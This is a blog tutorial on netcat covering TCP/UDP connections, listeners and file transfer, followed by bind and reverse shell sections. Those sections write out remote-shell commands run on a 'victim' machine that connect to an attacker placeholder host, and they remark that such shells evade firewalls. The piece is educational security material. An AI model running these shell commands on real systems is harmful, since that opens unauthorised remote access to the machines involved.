Netcat The Hacker's Swiss Army Knife
Thilan Dissanayaka Computer Networking Feb 27, 2020

Netcat The Hacker's Swiss Army Knife

Netcat, often abbreviated as nc, is a versatile command-line networking tool that can be used for almost anything related to TCP, UDP, or UNIX-domain sockets. It's beloved by network engineers, sysadmins, and ethical hackers alike for its power and simplicity.

Connecting to a TCP/UDP Port

One of Netcat’s most basic functions is connecting to open TCP or UDP ports on remote systems. This is often used for testing services or debugging.

TCP Connection

nc <host> <port>
nc example.com 80

Once connected, you can type HTTP requests manually:

GET / HTTP/1.1

Host: example.com Example session:

thilan@macbook:~$ nc hacksland.net 443
GET /HTTP/1.1
<html>
<head><title>400 The plain HTTP request was sent to HTTPS port</title></head>
<body>
<center><h1>400 Bad Request</h1></center>
<center>The plain HTTP request was sent to HTTPS port</center>
<hr><center>cloudflare</center>
</body>
</html>

πŸ“‘ UDP Connection

nc -u <host> <port>
nc -u 192.168.1.10 12345

Useful for checking if a UDP service is responsive.

πŸ“‘ Listening on a TCP/UDP Port Netcat can also operate as a server, listening for incoming connections. This is especially useful for testing and scripting.

βœ… TCP Listener

nc -l <port>

πŸ“Œ Example:

nc -l 4444

Connecting from another machine:

thilan@ubuntu:~$ nc -lv 4444
Listening on 0.0.0.0 4444
Connection received on 111.223.183.3 5839
hiii
hello from ubuntu
thilan@macbook:~$ nc 82.29.160.2 4444
hiii
hello from ubuntu

πŸ“‘ UDP Listener

nc -lu πŸ“Œ Example:

nc -lu 12345

Send data from another machine:

nc -u <host> 12345

πŸ“ Transferring Files with Netcat Netcat can easily transfer files over a network without needing FTP or SCP.

Send a file:

# Receiver
nc -l 4444 > received_file.txt

Receive the file from another terminal:

Sender

nc 4444 < file_to_send.txt πŸ“ Tip: Works best over TCP. Ensure firewall ports are open on both ends.

Transfer binary files:

Receiver

nc -l 4444 > file.bin

Sender

nc 4444 < file.bin βœ… Use md5sum or sha256sum after transfer to verify integrity.

πŸͺŸ Netcat Bind Shell A bind shell is when a target machine opens a port and spawns a shell waiting for a connection.

⚠️ Only use this on machines you have permission to test.

On the victim machine (listener):

nc -l -p 4444 -e /bin/bash     # Linux
nc -l -p 4444 -e cmd.exe       # Windows

On the attacker's machine:

nc <target-ip> 4444

πŸ•³οΈ Netcat Reverse Shell A reverse shell is where the victim connects back to the attacker and sends a shell session.

On the attacker's machine (listener):

nc -l -p 4444

On the victim's machine:

nc <attacker-ip> 4444 -e /bin/bash     # Linux
nc <attacker-ip> 4444 -e cmd.exe       # Windows

πŸ” Reverse shells are more firewall-evading because they originate from the inside out.

Netcat Variants & Security Notes

Modern systems may include restricted versions of Netcat, especially the OpenBSD variant, which disables the -e option for security reasons.

βœ… Ncat (from Nmap) - safer & more powerful:

ncat --exec \"/bin/bash\" --allow <attacker-ip> -l 4444

Or from the victim:

ncat <attacker-ip> 4444 -e /bin/bash

🧠 Pro Tips for Using Netcat Use -v for verbose output.

Use -w to set timeouts (e.g., -w 3).

Pipe into nc for automation with scripts.

Combine with tar to send entire folders.

On Windows, consider using ncat.exe from Nmap for full functionality.

ALSO READ
Exploiting a  Stack Buffer Overflow  on Linux
Apr 01 Exploit development

Have you ever wondered how attackers gain control over remote servers? How do they just run some exploit and compromise a computer? If we dive into the actual context, there is no magic happening....

Common Web Application Attacks
Feb 05 Application Security

Web applications are one of the most targeted surfaces by attackers. This is primarily because they are accessible over the internet, making them exposed and potentially vulnerable. Since these...

Basic concepts of Cryptography
Mar 01 Cryptography

Ever notice that little padlock icon in your browser's address bar? That's cryptography working silently in the background, protecting everything you do online. Whether you're sending an email,...

Bypassing DEP with Return-to-libc
Apr 05 Exploit development

DEP makes the stack non-executable β€” our shellcode can't run. The simplest bypass? Don't inject code at all. Instead, call functions that already exist in libc. In this post, we exploit a stack overflow to call system('/bin/sh') without writing a single byte of shellcode.

Exploiting a format string vulnerebility on Linux
Apr 12 Exploit development

A misused printf can leak stack contents, read arbitrary memory, and write to arbitrary addresses. Format string vulnerabilities are one of the most powerful bug classes in C and they're the key to defeating ASLR. In this post, we exploit printf from leak to shell.

 OWASP Top 10 explained - 2021
Feb 11 Application Security

The Open Worldwide Application Security Project (OWASP) is a nonprofit foundation focused on improving the security of software. It provides free, vendor neutral tools, resources, and standards that...